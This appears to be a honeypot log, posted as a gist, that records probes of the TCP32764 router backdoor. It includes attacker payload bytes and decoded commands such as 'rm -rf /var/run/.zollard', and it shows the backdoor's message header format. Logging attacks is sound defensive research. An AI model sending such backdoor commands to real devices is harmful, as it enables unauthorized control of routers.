@sja
Created March 6, 2014 08:16
Router Backdoor
20 Feb 17:14:19 - Starting Honeypot for router backdoor "TCP32764"...
20 Feb 17:14:19 - Honeypot is running at 32764
20 Feb 17:14:19 - Found 1 pseudo configurations.
20 Feb 17:14:24 - Resolved public ip to 5.147.72.205
24 Feb 19:12:50 - 79.119.143.37:3154 - Connecting...
24 Feb 19:12:50 - 79.119.143.37:3154 - Client joined...
24 Feb 19:12:50 - 79.119.143.37:3154 - Ignore 'blablablabla' request, maybe this is a test by 'poc.py'.
24 Feb 19:12:50 - 79.119.143.37:3154 - Reverse DNS: '79-119-143-37.rdsnet.ro'
79.119.143.37:3154 - ERROR: { [Error: read ECONNRESET] code: 'ECONNRESET', errno: 'ECONNRESET', syscall: 'read' }
24 Feb 19:12:51 - 79.119.143.37:3154 - Connection to client crashed
24 Feb 19:12:51 - 79.119.143.37:3155 - Connecting...
24 Feb 19:12:51 - 79.119.143.37:3155 - Client joined...
24 Feb 19:12:51 - 79.119.143.37:3155 - Payload as bytes: [83,99,77,77,0,0,0,7,0,0,0,25,114,109,32,45,114,102,32,47,118,97,114,47,114,117,110,47,46,122,111,108,108,97,114,100,0]
24 Feb 19:12:51 - 79.119.143.37:3155 - execute/cmd: rm -rf /var/run/.zollard
24 Feb 19:12:51 - 79.119.143.37:3155 - Reverse DNS: '79-119-143-37.rdsnet.ro'
24 Feb 19:12:51 - 79.119.143.37:3155 - Payload as bytes: [83,99,77,77,0,0,0,7,0,0,0,27,109,107,100,105,114,32,45,112,32,47,118,97,114,47,114,117,110,47,46,122,111,108,108,97,114,100,0]
24 Feb 19:12:51 - 79.119.143.37:3155 - execute/cmd: mkdir -p /var/run/.zollard
79.119.143.37:3155 - ERROR: { [Error: read ECONNRESET] code: 'ECONNRESET', errno: 'ECONNRESET', syscall: 'read' }
24 Feb 19:12:51 - 79.119.143.37:3155 - Connection to client crashed
26 Feb 23:32:52 - 93.174.90.30:18148 - Connecting...
26 Feb 23:32:52 - 93.174.90.30:18148 - Client joined...
26 Feb 23:32:52 - 93.174.90.30:18148 - Reverse DNS: '2.shulgin.dc1.nl.tor.exit.node.qwertyoruiop.com'
26 Feb 23:32:53 - 93.174.90.30:18148 - Skipping message because invalid header: 2054122604
26 Feb 23:33:22 - 93.174.90.30:18148 - Connection closed after 30.577s, 12 Bytes read and 0 Bytes written
26 Feb 23:33:22 - 93.174.90.30:18148 - Client left
2 Mar 09:31:20 - 37.24.8.25:57537 - Connecting...
2 Mar 09:31:20 - 37.24.8.25:57537 - Client joined...
2 Mar 09:31:20 - 37.24.8.25:57537 - Reverse DNS: 'ip-37-24-8-25.unitymediagroup.de'
2 Mar 09:31:20 - 37.24.8.25:57537 - Processing failed: Invalid message
2 Mar 09:31:20 - 37.24.8.25:57537 - Connection closed after 0.042s, 5 Bytes read and 12 Bytes written
2 Mar 09:31:20 - 37.24.8.25:57537 - Client left
2 Mar 10:19:12 - 37.24.8.25:35753 - Connecting...
2 Mar 10:19:12 - 37.24.8.25:35753 - Client joined...
2 Mar 10:19:12 - 37.24.8.25:35753 - Processing failed: Invalid message
2 Mar 10:19:12 - 37.24.8.25:35753 - Reverse DNS: 'ip-37-24-8-25.unitymediagroup.de'
2 Mar 10:19:12 - 37.24.8.25:35753 - Connection closed after 0.019s, 5 Bytes read and 12 Bytes written
2 Mar 10:19:12 - 37.24.8.25:35753 - Client left
2 Mar 10:19:12 - 37.24.8.25:34867 - Connecting...
2 Mar 10:19:12 - 37.24.8.25:34867 - Client joined...
2 Mar 10:19:12 - 37.24.8.25:34867 - Payload as bytes: [83,99,77,77,0,0,0,1,0,0,0,0]
2 Mar 10:19:12 - 37.24.8.25:34867 - Sending config...
2 Mar 10:19:12 - 37.24.8.25:34867 - Reverse DNS: 'ip-37-24-8-25.unitymediagroup.de'
2 Mar 10:19:12 - 37.24.8.25:34867 - Connection closed after 0.129s, 12 Bytes read and 3670 Bytes written
2 Mar 10:19:12 - 37.24.8.25:34867 - Client left
2 Mar 18:03:28 - 71.6.167.142:34061 - Connecting...
2 Mar 18:03:28 - 71.6.167.142:34061 - Client joined...
2 Mar 18:03:28 - 71.6.167.142:34061 - Reverse DNS: 'census9.shodan.io'
2 Mar 18:03:32 - 71.6.167.142:34061 - Connection closed after 4.187s, 0 Bytes read and 0 Bytes written
2 Mar 18:03:32 - 71.6.167.142:34061 - Client left
3 Mar 23:02:13 - 86.173.188.100:39472 - Connecting...
3 Mar 23:02:13 - 86.173.188.100:39472 - Client joined...
3 Mar 23:02:13 - 86.173.188.100:39472 - Connection closed after 0.023s, 0 Bytes read and 0 Bytes written
3 Mar 23:02:13 - 86.173.188.100:39472 - Client left
3 Mar 23:02:13 - 86.173.188.100:39472 - Reverse DNS: 'host86-173-188-100.range86-173.btcentralplus.com'
3 Mar 23:13:50 - 86.173.188.100:39699 - Connecting...
3 Mar 23:13:50 - 86.173.188.100:39699 - Client joined...
3 Mar 23:13:50 - 86.173.188.100:39699 - Processing failed: Invalid message
3 Mar 23:13:50 - 86.173.188.100:39699 - Reverse DNS: 'host86-173-188-100.range86-173.btcentralplus.com'
3 Mar 23:13:50 - 86.173.188.100:39699 - Connection closed after 0.005s, 9 Bytes read and 12 Bytes written
3 Mar 23:13:50 - 86.173.188.100:39699 - Client left
4 Mar 00:03:22 - 86.173.188.100:40402 - Connecting...
4 Mar 00:03:22 - 86.173.188.100:40402 - Client joined...
4 Mar 00:03:22 - 86.173.188.100:40402 - Reverse DNS: 'host86-173-188-100.range86-173.btcentralplus.com'
4 Mar 00:03:22 - 86.173.188.100:40402 - Processing failed: Invalid message
4 Mar 00:03:22 - 86.173.188.100:40402 - Connection closed after 0.003s, 9 Bytes read and 12 Bytes written
4 Mar 00:03:22 - 86.173.188.100:40402 - Client left